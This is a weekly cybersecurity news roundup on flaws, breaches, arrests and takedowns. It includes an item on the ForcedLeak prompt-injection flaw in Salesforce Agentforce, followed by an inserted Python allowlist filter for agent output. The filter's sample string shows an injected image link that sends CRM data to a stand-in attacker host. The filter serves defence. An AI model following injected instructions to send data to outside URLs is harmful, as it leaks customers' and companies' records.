Major Flaws, Disruptive Attacks, And Coordinated Takedowns Shaped A Week Of Cyber Threats And Decisive Responses

Written by: Vishwa Pandagle, Cybersecurity Staff Editor

This week’s cybersecurity stories cover a wide range of incidents. We saw fresh software flaws with global impact, and data leaks targeting vulnerable communities. Investigations into major attacks led to arrests, while global law enforcement coordinated takedowns of cybercrime groups. 

Financial theft, digital fraud, and disruptions to air travel shed light on cyberattacks that affect daily life. The week also showed that law enforcement crackdowns remain central to response efforts.

Read on for the top cybersecurity news.

Critical Cisco SNMP Vulnerability in IOS and IOS XE Software Could Allow Remote Code Execution

Cisco warned customers of a serious SNMP flaw affecting IOS and IOS XE software. Attackers could exploit the weakness to gain remote code execution, putting routers and switches at risk worldwide. Devices running exposed configurations are especially vulnerable. Cisco confirmed no workarounds exist, urging administrators to install patches immediately.

The flaw highlights persistent risks in core networking gear. Customers relying on Cisco infrastructure face urgent updates to avoid disruption and possible remote compromise.

Hacker Gang Claims Breach of Preschool, Posts Child Profiles and Family Contact Details on the Dark Web

A hacker gang claimed it breached a preschool system and posted sensitive child and family records on the dark web. The Radiant Group ransomware gang has claimed responsibility for the Kido International Preschool & Daycare cyber attack. 

The data allegedly included photos, addresses, and parent contacts, sparking widespread outrage. Security experts warned that such breaches create risks of extortion and identity theft targeting families. Law enforcement is investigating the claims as parents demand answers from the institution.

UK Arrest Made in Collins Aerospace Ransomware Attack Investigation

British police arrested a suspect linked to the ransomware attack on Collins Aerospace, a critical defense and aviation contractor. The ransomware incident disrupted company systems and prompted urgent responses from authorities concerned about national security exposure. 

Investigators traced digital evidence leading to the suspect’s arrest, though further arrests are expected. The incident highlights cross-border cooperation as police continue to pursue actors behind attacks threatening global defense supply chains.

Secret Service Dismantles Major Telecommunications Threat in New York

The U.S. Secret Service dismantled a large-scale telecommunications fraud operation in New York. Officials reported the group ran illegal schemes, causing millions in financial losses. Authorities seized equipment used to bypass legitimate networks and reroute calls for profit. 

The takedown followed months of surveillance and international coordination, reflecting growing threats from telecom-based fraud. Investigators said the operation was linked to organized crime networks abroad.

Hacker Drains Cancer Patient’s $32K Treatment Fund Through Fake Steam Game, Outraged Community Hunts Him Down

A hacker tricked a cancer patient into losing about $32,000 meant for their treatment by using a fake Steam game scam. The crypto theft sparked outrage from community members and a volunteer-led investigation to find the hacker.

Cybersecurity professionals and OSINT specialists traced the alleged hacker, who carried out the theft to buy expensive watches and sports cars. The malicious game has been removed from Steam. Within days, the community identified the suspect and restored the stolen amount.

European Airports Face Disruption, Check-In Systems Issues After Cyberattack

Airports across Europe experienced check-in disruptions after a cyberattack. Passengers faced delays and cancellations while staff were forced to use manual processes. Officials confirmed systems were gradually restored. 

Travelers were forced to halt and reschedule as flights were interrupted. The incident originated in the Collins Aerospace MUSE system, which is a software platform used for passenger check-in, boarding, and baggage handling.

Interpol Operation Recovers Approximately $440 Million in Global Crackdown

Interpol announced a crackdown leading to the recovery of $440 million from global cyber-enabled crime networks. The operation spanned 40 countries and focused on money laundering and online scams. 

In the operation, named Operation HAECHI VI, investigators froze bank accounts linked to cybercrime. The effort is one of the largest coordinated financial recovery campaigns to date. Authorities pledged further collaboration against cross-border cybercriminal syndicates.

ForcedLeak Vulnerability in Salesforce Agentforce Exposed CRM Data Through Indirect AI Prompt Injection

Researchers disclosed the ForcedLeak vulnerability affecting Salesforce’s Agentforce AI-driven CRM tool. The flaw allowed attackers to use indirect prompt injection to force data leaks from corporate systems. 

Sensitive CRM records, including customer and sales data, could be exposed without direct system access. Salesforce addressed the issue with urgent fixes and urged customers to validate deployments. The fix prevents Agentforce agents from sending output to untrusted URLs. 
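The control described above, blocking agent output that points at untrusted URLs, can be sketched as an output filter. This is an added example, not Salesforce's implementation; the host names, `TRUSTED_HOSTS`, and the function names are hypothetical, and the sample text is constructed.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would load this from policy.
TRUSTED_HOSTS = {"example-crm.test", "cdn.example-crm.test"}

# Absolute http(s) URLs and protocol-relative ("//host/...") references.
URL_RE = re.compile(r"""(?:https?:)?//[^\s<>"')\]]+""", re.IGNORECASE)

def is_trusted(url, trusted=TRUSTED_HOSTS):
    """True only for https URLs whose exact host is on the allowlist."""
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port  # .port raises on a bad port
    except ValueError:
        return False
    if parts.scheme.lower() != "https" or host is None:
        return False
    if parts.username or parts.password:  # https://trusted@other-host/ trick
        return False
    if port not in (None, 443):
        return False
    # Exact match: a trusted name used as a subdomain label does not pass.
    return host.lower().rstrip(".") in trusted

def sanitize_agent_output(text, trusted=TRUSTED_HOSTS):
    """Replace every untrusted URL; return (clean_text, blocked_urls)."""
    blocked = []

    def _sub(match):
        url = match.group(0)
        if is_trusted(url, trusted):
            return url
        blocked.append(url)
        return "[blocked-url]"

    return URL_RE.sub(_sub, text), blocked

# Constructed sample: agent output after an injected instruction asked it to
# embed CRM data in an image URL on a host the organisation does not control.
SAMPLE = (
    "Lead summary ready. ![logo](https://attacker.invalid/p.png?d=ACME%20contacts) "
    "Details: https://example-crm.test/leads/42 "
    "Mirror: https://example-crm.test.attacker.invalid/x "
    "Alt: https://example-crm.test@attacker.invalid/y"
)

if __name__ == "__main__":
    clean, blocked = sanitize_agent_output(SAMPLE)
    print(clean)
    print("blocked:", blocked)
```

The filter fails closed: anything that does not parse as an https URL on an exact allowlisted host is replaced, including look-alike subdomains and userinfo tricks.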

Scattered Spider Suspect Arrested in Las Vegas Following Surrender

Authorities confirmed the arrest of a suspected member of Scattered Spider, the hacking group linked to major ransomware attacks. The suspect surrendered in Las Vegas following pressure from investigators. 

Scattered Spider has targeted casinos, telecoms, and corporate networks with social engineering and ransomware tactics. Although disrupting one operator will not dismantle the group, it demonstrates progress in ongoing international investigations into high-profile cybercrime networks.

Expert Comment on Cloud-Delivered Threats:

“These massive ecosystems, and the fact that most employees trust what they find in them, make it easier for attackers to hide malware and compromise employees and organisations. The winning trifecta to defend against cloud-delivered threats is ‘inspection, detection, protection’. 

That includes building the capability to inspect all traffic to and from cloud applications in real-time, including decrypting SSL/TLS traffic to inspect file contents. Advanced Threat Protection can detect high-risk files and automatically hold and inspect them in a sandbox environment before they can be downloaded to a user's device. 

Finally, cloud-native DLP can prevent employees from uploading sensitive data to unapproved cloud storage instances, limiting the data that can be exfiltrated and broadly reducing the risk associated with unapproved app use.”

— Ray Canzanese, Director of Netskope Threat Labs

The Impact and What’s Ahead

This week's cybersecurity landscape reflected attacks targeting companies, airports, and individuals. Yet even as we witness cybercrimes, law enforcement scores major wins with arrests and multimillion-dollar recoveries.

It is encouraging that takedowns and global cooperation continue to dismantle criminal infrastructure. Cybercrime remains a challenge, but every single crackdown reinforces collective resilience. There is more defensive action unfolding than criminals would like us to believe.

